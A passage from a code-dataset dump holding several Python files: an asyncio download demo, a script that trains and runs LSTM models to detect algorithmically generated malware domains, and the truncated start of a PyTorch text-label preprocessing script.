{"api_name": "sklearn.pipeline.Pipeline", "line_number": 445, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 445, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 446, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 459, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 479, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 489, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 489, "usage_type": "name"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 495, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 495, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 503, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 503, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 511, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 512, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 512, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 513, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 513, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 514, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 514, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 515, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 515, "usage_type": "name"}]} +{"seq_id": "168121368", "text": "import asyncio\nimport aiohttp\n\nasync def download(visits, site):\n count = 0\n for _ in range(visits):\n print(f\"downloading {site}\")\n async with aiohttp.ClientSession() as session:\n async with session.get(site) as response:\n html = await response.text()\n count += len(html)\n message = f\"{site} returned {count//1000}K characters\"\n return message\n\nasync def main():\n # note each download yields immediately so that other downloads \n # can run in parallel. 
main waits until all results are available\n response = await asyncio.gather(\n download(15, \"http://ibm.com\"),\n download(20, \"http://bbc.co.uk\"),\n download(25, \"http://abc.com\")\n )\n print(response)\n \nasyncio.run(main())\n\n", "sub_path": "src/17 Threading and Concurrency/AsyncIO/07.futures.py", "file_name": "07.futures.py", "file_ext": "py", "file_size_in_byte": 780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 8, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 18, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "245138893", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Libraries\nimport os\nimport argparse\nimport sys\nimport time\nimport json\nimport re\nimport numpy as np\nimport pandas as pd\nimport statistics as stat\nimport lstm_binary\nimport lstm_multiclass\nfrom pprint import pprint\nfrom datetime import datetime\nfrom shutil import copy2\nfrom sklearn.model_selection import train_test_split\nimport pickle\n\n# constants\nmodels_path = '../data/local/models/'\ndata_path = '../data/local/staging/'\n\nREFPATH = \"./\"\nPROJECT_ROOT = \"/Users/nscsekhar/Desktop/nscsekhar/Desktop/Surya/Personal/MIDS/W210/Project/team_cyber/\"\nMULTI_TOKENIZER_FILE = PROJECT_ROOT + \"saved_models/multiclass_tokenizer.pkl\"\nMULTI_CATEGORIES_FILE = PROJECT_ROOT + \"saved_models/multiclass_categories.pkl\"\nMULTI_MODEL_JSON = PROJECT_ROOT + \"saved_models/multiclass_LSTM.json\"\nMULTI_MODEL_H5 = PROJECT_ROOT + \"saved_models/multiclass_LSTM.h5\"\n\n\ndef valid_filename(filename, path=''):\n '''valid_filename: determines if the given filename is a real file. Assumes that the file is in the current working directory for the program.\n\n returns: given file name\n '''\n if path == '':\n path = os.getcwd()+'/'\n\n if not os.path.isfile(path+filename):\n msg = \"The given file '{}' does not exist at '{}'.\".format(\n filename,\n path\n )\n raise argparse.ArgumentTypeError(msg)\n\n return filename\n\n\ndef parse_args():\n '''parse_args: parse command line arguments\n\n return: dictionary of arguments\n '''\n parser = argparse.ArgumentParser(\n description='Runs models either in train or inference mode.',\n prog='models',\n epilog='Models requires at least one of -t/--train or -i/--inference to operate correctly. Both may be provided for sequential analysis.')\n parser.add_argument('config_file',\n type=valid_filename,\n metavar='CONFIG_FILE',\n help=\"File path to the requex configuration file. File must be in JSON format.\")\n parser.add_argument('-t', '--train',\n metavar='TRAINING_FILE',\n nargs=1,\n help=\"Runs models in training mode. Training will be run on the given file. The training file must be a prepared '.csv' file. The program will search for the file in the models, then staging, and finally downloads directories.\")\n parser.add_argument('-i', '--inference',\n metavar='INFERENCE_FILE',\n nargs=1,\n help=\"Runs models in inference mode. Inference will be run on the given file. The inference file must be a list of domains separated by carriage returns with no header. The program will search for the file in the models, then staging, and finally downloads directories.\")\n parser.add_argument('-m', '--model', choices=['binary', 'multiclass'],\n metavar='model_type',\n required=True,\n help=\"This required option indicates which type of model is being built or used. 
Using 'binary' selects a benign/malicious model. Using 'multiclass' will classify the malware family for each malicious classified entry.\")\n\n return vars(parser.parse_args())\n\n\ndef get_config_filename(filename=None):\n '''get_config_filename: returns a verified Requex configuration file name. This function handles the ambiguity around whether the module was called from a shell with command line arguments or if called from another program using the run() function. If filename is none, the function assumes that there are\n\n return: string; valid filename.\n '''\n if filename is None:\n # get command line arguments\n args = parse_args()\n filename = args['config_file']\n else:\n # filename provided, verify the file exists\n if not os.path.isfile(filename):\n print(\"The given file '{}' does not exist at '{}'.\".format(\n filename,\n os.getcwd()\n ))\n exit(1)\n return filename\n\n\ndef get_config(filename):\n '''get_config: reads the configuration JSON file and stores values in a dictionary for processing.\n\n PRE: assumes the file already exists\n\n return: dict of configuration settings\n '''\n\n with open(filename, \"r\") as f:\n config = json.load(f)\n\n return config\n\n\ndef get_file_date(filename):\n '''get_file_date: extracts file date from file name. File date must be in YYYY-MM-DD format.\n\n returns: datetime object of file date.\n '''\n date = re.search(r'\\d\\d\\d\\d-\\d\\d-\\d\\d|$', filename).group()\n year, month, day = date.split('-')\n return datetime(int(year), int(month), int(day))\n\n\ndef write_to_train_logfile(metrics, logpath, stdout=True):\n '''write_to_train_logfile: writes metadata in the metrics dict to a logfile\n '''\n # constants\n logfile = 'requex_training_log.csv'\n\n # write to logfile\n stamp = datetime.utcnow().strftime('%Y-%m-%d-%H:%M')\n\n # extract the filename\n # filename = os.path.basename(datafile)\n\n if stdout:\n # print(\"info:{:>10} rows: {:>10} malicious, {:>10} benign, a {:>3.3f} ratio\".format(total_rows, malicious_rows, benign_rows, ratio))\n print('info: {}, {}, {}, {:>3.3f}s, {:>3.2f} MB, {} rows: {} malicious, {} benign, {:>3.3f} ratio, {}, {} categories, train rows: {}, test rows: {}, train time: {:>3.3f}s, inference time: {:>3.3f}s'.format(\n stamp, metrics['filename'], metrics['filedate'], metrics['time'], metrics['memory'], metrics['total_rows'], metrics['malicious_rows'], metrics['benign_rows'], metrics['ratio'], metrics['model'], metrics['categories'], metrics['train_rows'], metrics['test_rows'], metrics['train_time'], metrics['inference_time']))\n\n with open(logpath+logfile, 'at') as log:\n log.write('{}, {}, {}, {:>3.3f}, {:>3.2f}, {}, {}, {}, {:>3.3f}, {}, {}, {}, {}, {:>3.3f}, {:>3.3f}\\n'.format(\n stamp, metrics['filename'], metrics['filedate'], metrics['time'], metrics['memory'], metrics['total_rows'], metrics['malicious_rows'], metrics['benign_rows'], metrics['ratio'], metrics['model'], metrics['categories'], metrics['train_rows'], metrics['test_rows'], metrics['train_time'], metrics['inference_time']))\n\n\ndef copy_models(src, dst):\n '''copy_models: copies the source file (src) to the dst directory. src must be a file and dst must be a directory. 
Exclusions is an optional parameter that allows for files with certain file names to be excluded from being moved.\n '''\n # check to see if a directory for the dst directory exists\n if not os.path.isdir(dst):\n # directory does not exist, create it\n os.mkdir(dst)\n\n # verify whether the source and destination are the same\n src_path, filename = os.path.split(src)\n if os.path.isfile(dst+filename):\n print(\"A file by the name '{}' already exists. File not copied. Processing will continue using the file already in the '{}' directory.\".format(filename, dst))\n elif os.path.isfile(src):\n copy2(src, dst)\n else:\n print(\"The given file '{}' does not exist.\".format(src))\n exit(1)\n\n\ndef get_training_data(filename, metrics, logpath):\n '''get_training_data: reads the csv file into a pandas dataframe\n\n return: pandas dataframe\n '''\n # constants\n MB = 1024*1024\n\n start_time = time.time()\n df = pd.read_csv(filename,\n sep=',',\n parse_dates=[0],\n dtype={1: int, 2: str, 3: str},\n engine='c')\n end_time = time.time()\n read_time = end_time - start_time\n\n # calculate the memory footprint of the dataframe\n memory = sys.getsizeof(df)/MB\n\n filedate = get_file_date(filename)\n total = df.shape[0]\n benign = df.loc[df['dga'] == 0].shape[0]\n malicious = df.loc[df['dga'] == 1].shape[0]\n ratio = malicious / benign\n\n # write to logfile\n # write_to_train_logfile(logpath, filename, filedate.strftime('%Y-%m-%d'), read_time, memory, total, malicious, '2',benign, ratio)\n metrics = {\n 'filename': filename,\n 'filedate': filedate.strftime('%Y-%m-%d'),\n 'time': read_time,\n 'memory': memory,\n 'total_rows': total,\n 'malicious_rows': malicious,\n 'benign_rows': benign,\n 'ratio': ratio,\n 'categories': 0,\n 'model': 'unknown',\n 'train_rows': 0,\n 'test_rows': 0,\n 'train_time': 0,\n 'inference_rows': 0,\n 'inference_time': 0,\n 'inference_time_mean': 0.0\n }\n\n return df, metrics\n\n\ndef prep_training_dataset_binary(df):\n '''prep_training_dataset_binary: creates X, Y datasets for training and testing.\n\n returns: pandas dataframe x4: X_train, X_test, Y_train, Y_test\n '''\n # create X, Y dataframes. X = 'domain' and the model will try to\n # predict Y the catengory index.\n X = df['domain']\n Y = df['dga']\n\n X_train, X_test, Y_train, Y_test = train_test_split(\n X, Y, test_size=0.2, random_state=23)\n\n return X_train, X_test, Y_train, Y_test\n\n\ndef prep_training_dataset_multiclass(df, categories_file):\n '''prep_training_dataset_multiclass: creates X, Y datasets for training and testing.\n\n returns: pandas dataframe x4: X_train, X_test, Y_train, Y_test and the number of uniques\n '''\n\n # factorize the malware column\n df['catIndex'], uniques = pd.factorize(df['malware'], sort=True)\n\n # display factorized values\n # print('malware uniques: total - {}\\n{}'.format(len(uniques), uniques))\n # print('catIndex uniques: {}'.format(\n # pd.unique(df['catIndex'].sort_values())))\n\n # record the categories to disk\n with open(categories_file, 'wb') as f:\n pickle.dump(uniques, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n # create X, Y dataframes. X = 'domain' and the model will try to\n # predict Y the catengory index.\n X = df['domain']\n Y = df['catIndex']\n\n X_train, X_test, Y_train, Y_test = train_test_split(\n X, Y, test_size=0.2, random_state=23)\n\n return X_train, X_test, Y_train, Y_test, len(uniques)\n\n\ndef get_model_info(model_type, config):\n '''get_model_info: returns a dictionary with key value pairs of model file keys and model file names. 
The model file names are full path names anchored to the root_dir and placed in the models directory.\n\n type: a string indicating the type of model ['binary', ['multiclass']\n config: a dict filled with configuration parameters\n\n return: dict of model:filename pairs\n '''\n\n if model_type == 'binary':\n model = config['binary_model']\n elif model_type == 'multiclass':\n model = config['multiclass_model']\n else:\n # this branch shouldn't happen with the way parse_args() written\n msg = \"error: unsupported model type '{}'.\".format(model_type)\n raise argparse.ArgumentTypeError(msg)\n exit(1)\n\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n model = {\n 'model_json': root_dir+models_dir+model['model_json'],\n 'model_H5': root_dir+models_dir+model['model_H5'],\n 'model_tokenizer': root_dir+models_dir+model['model_tokenizer'],\n 'model_categories': root_dir+models_dir+model['model_categories'],\n 'model_algorithm': model['model_algorithm']\n }\n\n return model\n\n\ndef find_file(filename, config):\n '''find_file: looks for the file in a few directories and moves it into the models_dir. Returns the full path to the training file.\n\n return: string of full file path in the models_dir or an empty string\n '''\n root_dir = config['root_dir']\n downloads_dir = config['downloads_dir']\n staging_dir = config['staging_dir']\n models_dir = config['models_dir']\n\n # look for file in models_dir\n # look for file in staging_dir\n # look for file in downloads_dir\n if os.path.isfile(root_dir+models_dir+filename):\n return root_dir+models_dir\n elif os.path.isfile(root_dir+staging_dir+filename):\n return root_dir+staging_dir\n elif os.path.isfile(root_dir+downloads_dir+filename):\n return root_dir+downloads_dir\n else:\n return ''\n # msg = \"The given file '{}' does not exist at any of these locations '{}', '{}', '{}'.\".format(\n # filename,\n # models_dir,\n # staging_dir,\n # downloads_dir\n # )\n # print(msg)\n # exit(1)\n\n\ndef get_model_type(model_type):\n '''get_model_type: evaluates model_type to see if it is a valid option. If model_type is empty, function will attempt to pull the parameters from the command line. This function should mirror the choices in parse_args() for -m/--models.\n\n return: a string with the model_type; empty string if not correct.\n '''\n if model_type is '':\n args = parse_args()\n return args['model']\n elif model_type.lower() == 'binary':\n return 'binary'\n elif model_type.lower() == 'multiclass':\n return 'multiclass'\n else:\n return ''\n\n\ndef get_train_file(filename, config):\n '''get_train_file: evaluates the filename as well as command line arguments to get the training file name. 
Verifies that the training file exists.\n\n returns: string of a filename or empty string if not valid.\n '''\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n if filename == '':\n # no filename provided, attempt to get it from the command line\n # parameters\n args = parse_args()\n train_file = args['train']\n if train_file is not None:\n # extract the filename from the parameter list\n train_file = train_file[0]\n location = find_file(train_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+train_file, root_dir+models_dir)\n return root_dir+models_dir+train_file\n else:\n # the command line parameter for train_file was also None\n return ''\n else:\n # filename was provided\n location = find_file(train_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+train_file, root_dir+models_dir)\n return root_dir+models_dir+train_file\n\n\ndef get_inference_file(filename, config):\n '''get_inference_file: evaluates the filename as well as command line arguments to get the inference file name. Verifies that the inference file exists.\n\n returns: string of a filename or empty string if not valid.\n '''\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n if filename == '':\n # no filename provided, attempt to get it from the command line\n # parameters\n args = parse_args()\n inference_file = args['inference']\n if inference_file is not None:\n # extract the filename from the parameter list\n inference_file = inference_file[0]\n location = find_file(inference_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+inference_file, root_dir+models_dir)\n return root_dir+models_dir+inference_file\n else:\n # the command line parameter for inference_file was also None\n return ''\n else:\n # filename was provided\n location = find_file(inference_file, config)\n if location == '':\n # file was not found\n return ''\n else:\n copy_models(location+inference_file, root_dir+models_dir)\n return root_dir+models_dir+inference_file\n\n\ndef load_inference_data(filename):\n '''load_inference_data: reads data from the given filename. The file must be a text file with '\\n' at the end of each entry, one entry per line.\n\n returns: list of data to be analyzed\n '''\n domains = []\n with open(filename, 'rt', newline='\\n') as f:\n lines = f.readlines()\n\n for line in lines:\n domains.append(line.strip())\n\n return domains\n\n\ndef write_predictions(domains, predictions, model_type, model_algo, version, config):\n '''write_predictions: takes a 1-D list of domains and predictions and writes them to the inference file output. 
File name will be 'predictions_YYYY-MM-DD.txt'.\n '''\n\n # create filename\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n\n # get the current date and time:\n datestamp = time.strftime('%Y-%m-%d', time.gmtime())\n timestamp = time.strftime('%H:%M.%S', time.gmtime())\n\n output_file = root_dir+models_dir+model_type+model_algo+'_predictions_'+datestamp+'_v'+version+'.csv'\n\n # write the predictions to disk\n with open(output_file, 'wt') as f:\n f.write('creation_date: {} {}\\n'.format(datestamp, timestamp))\n for i, p in enumerate(predictions):\n # print('i: {}, p: {}, domains: {}'.format(i, p, domains[i]))\n f.write('{}, {}\\n'.format(domains[i], p))\n\n\ndef get_version_number(filename):\n '''get_version_number: extracts the version number from the filename.\n\n returns: string with a version number in it.\n '''\n basename = os.path.basename(filename)\n reg = re.compile(r'(?:_v\\d+)|$', flags=re.IGNORECASE)\n return re.search(reg, basename).group()[2:]\n\n\ndef run(config_file=None, model_type='', train_file='', inference_file=''):\n # get configuration parameters\n config_file = get_config_filename(config_file)\n config = get_config(config_file)\n # print('configuration settings:')\n # pprint(config)\n\n # parse function/command line parameters\n model_type = get_model_type(model_type)\n train_file = get_train_file(train_file, config)\n inference_file = get_inference_file(inference_file, config)\n\n # assemble the path to the log directory\n root_dir = config['root_dir']\n models_dir = config['models_dir']\n logpath = root_dir+models_dir\n\n if model_type == '':\n print(\"error: an invalid model type was given. See the -h/--help command line options for valid model choices.\")\n exit(1)\n\n if train_file == '' and inference_file == '':\n print(\"error: neither train or inference were given as arguments. Please run again, but with either -t/--train or -i/--inference options (or both) enabled.\")\n exit(1)\n\n # get the model information from the configuration file\n model_info = get_model_info(model_type, config)\n metrics = {\n 'filename': '',\n 'filedate': '',\n 'time': 0.0,\n 'memory': 0.0,\n 'total_rows': 0,\n 'malicious_rows': 0,\n 'benign_rows': 0,\n 'ratio': 0.0,\n 'categories': 0,\n 'model': 'unknown',\n 'train_rows': 0,\n 'test_rows': 0,\n 'train_time': 0,\n 'inference_rows': 0,\n 'inference_time': 0,\n 'inference_time_mean': 0.0\n }\n\n if train_file != '':\n # a training file was provided\n model_version = get_version_number(train_file)\n\n # get training data from disk\n df, metrics = get_training_data(train_file, metrics, logpath)\n\n if model_type == 'binary':\n X_train, X_test, Y_train, Y_test = prep_training_dataset_binary(df)\n metrics['model'] = model_type\n metrics['categories'] = 2\n metrics['train_rows'] = X_train.shape[0]\n metrics['test_rows'] = X_test.shape[0]\n # pprint(metrics)\n print('info: {} – training started.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())))\n train_model = lstm_binary.LSTMBinary()\n start_time = time.time()\n train_model.train(X_train, Y_train)\n end_time = time.time()\n train_time = end_time - start_time\n metrics['train_time'] = train_time\n print('info: {} – training ended. 
Train time {:>3.3f}s.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime()), train_time))\n write_to_train_logfile(metrics, logpath, True)\n\n train_model.save(model_info['model_tokenizer'],\n model_info['model_json'],\n model_info['model_H5'])\n\n elif model_type == 'multiclass':\n # create X and Y and split into train and test\n X_train, X_test, Y_train, Y_test, categories = prep_training_dataset_multiclass(\n df, model_info['model_categories'])\n metrics['model'] = model_type\n metrics['categories'] = categories\n metrics['train_rows'] = X_train.shape[0]\n metrics['test_rows'] = X_test.shape[0]\n\n print('info: {} – training started.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())))\n start_time = time.time()\n train_model = lstm_multiclass.LSTMMulti()\n train_model.train(X_train, Y_train)\n end_time = time.time()\n train_time = end_time - start_time\n metrics['train_time'] = train_time\n print('info: {} – training ended. Train time {:>3.3f}s.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime()), train_time))\n write_to_train_logfile(metrics, logpath, True)\n\n train_model.save(model_info['model_tokenizer'],\n model_info['model_categories'],\n model_info['model_json'],\n model_info['model_H5'])\n else:\n print(\"error: unrecognized model type.\")\n exit(1)\n # train the model (which model is set by models input)\n # train_model.train(X_train, Y_train)\n # train_model.save(TOKENIZER_FILE, MODEL_JSON, MODEL_H5)\n # save the model to disk\n\n if inference_file != '':\n # an inference file was provided\n model_version = get_version_number(inference_file)\n print('inference file: {}'.format(inference_file))\n if model_type == 'binary':\n metrics['filename'] = inference_file\n metrics['filedate'] = time.strftime('%Y-%m-%d', time.gmtime())\n\n predict_model = lstm_binary.LSTMBinary()\n predict_model.load(model_info['model_tokenizer'],\n model_info['model_json'],\n model_info['model_H5'])\n domains = load_inference_data(inference_file)\n # print(\"Number of domains: \", len(domains))\n # print(\"Top 10:\\n\", domains[:10])\n\n # run predictions, record timings\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference started.'.format(timestamp))\n start_time = time.time()\n predictions = predict_model.predict(domains)\n end_time = time.time()\n prediction_time = end_time - start_time\n domain_count = len(domains)\n metrics['inference_rows'] = domain_count\n metrics['inference_time'] = prediction_time\n metrics['inference_time_mean'] = prediction_time / domain_count\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference ended. 
Inference time {:>3.3f}s.'.format(timestamp, prediction_time))\n\n # reshape the predictions\n predictions = np.reshape(predictions, [predictions.shape[0], ]).tolist()\n # print(predictions[:10])\n # print(\"domains: {}, predictions: {}\".format(len(domains), len(predictions)))\n\n # write the predictions to file\n write_predictions(domains, predictions, model_type, model_info['model_algorithm'], model_version, config)\n\n # write_to_train_logfile(metrics, logpath, True)\n elif model_type == 'multiclass':\n metrics['filename'] = inference_file\n metrics['filedate'] = time.strftime('%Y-%m-%d', time.gmtime())\n\n predict_model = lstm_multiclass.LSTMMulti()\n predict_model.load(model_info['model_tokenizer'],\n model_info['model_categories'],\n model_info['model_json'],\n model_info['model_H5'])\n domains = load_inference_data(inference_file)\n # print(\"Number of domains: \", len(domains))\n # print(\"Top 10:\\n\", domains[:10])\n\n # run predictions, record timings\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference started.'.format(timestamp))\n start_time = time.time()\n predictions, pred_prob = predict_model.predict(domains)\n end_time = time.time()\n prediction_time = end_time - start_time\n domain_count = len(domains)\n metrics['inference_rows'] = domain_count\n metrics['inference_time'] = prediction_time\n metrics['inference_time_mean'] = prediction_time / domain_count\n timestamp = time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())\n print('info: {} – inference ended. Inference time {:>3.3f}s.'.format(timestamp, prediction_time))\n\n # reshape the predictions\n # predictions = np.reshape(predictions, [predictions.shape[0], ]).tolist()\n # print(predictions[:10])\n # print(\"domains: {}, predictions: {}\".format(len(domains), len(predictions)))\n\n # write the predictions to file\n write_predictions(domains, predictions, model_type, model_info['model_algorithm'], model_version, config)\n else:\n print(\"error: unrecognized model type.\")\n exit(1)\n # get test data\n # load the model (based on models input)\n # testmodel = lstm_binary.LSTMBinary()\n # testmodel.load(BINARY_TOKENIZER_FILE, BINARY_MODEL_JSON, BINARY_MODEL_H5)\n # make predictions\n # urllist = [\"www.google.com\", \"www.netflix.com\", \"plvklpgwivery.com\"]\n # urltypes = testmodel.predict(urllist)\n # print(\"URL type:\", urltypes)\n\n\nif __name__ == '__main__':\n run()\n", "sub_path": "code/models/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 26220, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.getcwd", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 47, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 95, "usage_type": "call"}, {"api_name": "json.load", "line_number": 110, "usage_type": "call"}, {"api_name": "re.search", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 132, "usage_type": "call"}, {"api_name": 
"datetime.datetime", "line_number": 132, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 160, "usage_type": "call"}, {"api_name": "time.time", "line_number": 174, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 175, "usage_type": "call"}, {"api_name": "time.time", "line_number": 180, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 184, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 226, "usage_type": "call"}, {"api_name": "pandas.factorize", "line_number": 239, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 248, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 248, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 255, "usage_type": "call"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 277, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 309, "usage_type": "call"}, {"api_name": "os.path", "line_number": 309, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 311, "usage_type": "call"}, {"api_name": "os.path", "line_number": 311, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 439, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 439, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 440, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 440, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 458, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 458, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 459, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 522, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 522, "usage_type": "call"}, {"api_name": "lstm_binary.LSTMBinary", "line_number": 523, "usage_type": "call"}, {"api_name": "time.time", "line_number": 524, "usage_type": "call"}, {"api_name": "time.time", "line_number": 526, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 529, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 529, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 545, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 545, "usage_type": "call"}, {"api_name": "time.time", "line_number": 546, "usage_type": "call"}, {"api_name": "lstm_multiclass.LSTMMulti", "line_number": 547, "usage_type": "call"}, {"api_name": "time.time", "line_number": 549, "usage_type": 
"call"}, {"api_name": "time.strftime", "line_number": 552, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 552, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 573, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 573, "usage_type": "call"}, {"api_name": "lstm_binary.LSTMBinary", "line_number": 575, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 584, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 584, "usage_type": "call"}, {"api_name": "time.time", "line_number": 586, "usage_type": "call"}, {"api_name": "time.time", "line_number": 588, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 594, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 594, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 598, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 608, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 608, "usage_type": "call"}, {"api_name": "lstm_multiclass.LSTMMulti", "line_number": 610, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 620, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 620, "usage_type": "call"}, {"api_name": "time.time", "line_number": 622, "usage_type": "call"}, {"api_name": "time.time", "line_number": 624, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 630, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 630, "usage_type": "call"}]} +{"seq_id": "577887414", "text": "import torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\ntorch.manual_seed(1)\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import f1_score\nimport copy\n\n##########################################################\n\nlabel_to_ix=np.load('label_to_ix.npy').item()\nix_to_label=np.load('ix_to_label.npy')\ntraining_data=np.load('training_data.npy')\ntest_data=np.load('test_data.npy')\nval_data=np.load('val_data.npy')\nword_to_ix=np.load('word_to_ix.npy').item()\nix_to_word=np.load('ix_to_word.npy')\nnewwikivec=np.load('newwikivec.npy')\nwikivoc=np.load('wikivoc.npy').item()\n\n\n\nwikisize=newwikivec.shape[0]\nrvocsize=newwikivec.shape[1]\nwikivec=autograd.Variable(torch.FloatTensor(newwikivec))\n\nbatchsize=32\n\n\n\ndef preprocessing(data):\n\n new_data=[]\n for i, note, j in data:\n templabel=[0.0]*len(label_to_ix)\n for jj in j:\n if jj in wikivoc:\n templabel[label_to_ix[jj]]=1.0\n templabel=np.array(templabel,dtype=float)\n new_data.append((i, note, templabel))\n new_data=np.array(new_data)\n \n lenlist=[]\n for i in new_data:\n lenlist.append(len(i[0]))\n sortlen=sorted(range(len(lenlist)), key=lambda k: lenlist[k]) \n new_data=new_data[sortlen]\n \n batch_data=[]\n \n for start_ix in range(0, len(new_data)-batchsize+1, batchsize):\n thisblock=new_data[start_ix:start_ix+batchsize]\n mybsize= len(thisblock)\n numword=np.max([len(ii[0]) for ii in thisblock])\n main_matrix = np.zeros((mybsize, numword), dtype= np.int)\n for i in range(main_matrix.shape[0]):\n for j in range(main_matrix.shape[1]):\n try:\n if thisblock[i][0][j] in word_to_ix:\n main_matrix[i,j] = word_to_ix[thisblock[i][0][j]]\n \n except IndexError:\n pass # because initialze with 0, so you pad with 0\n \n xxx2=[]\n yyy=[]\n for ii in thisblock:\n xxx2.append(ii[1])\n 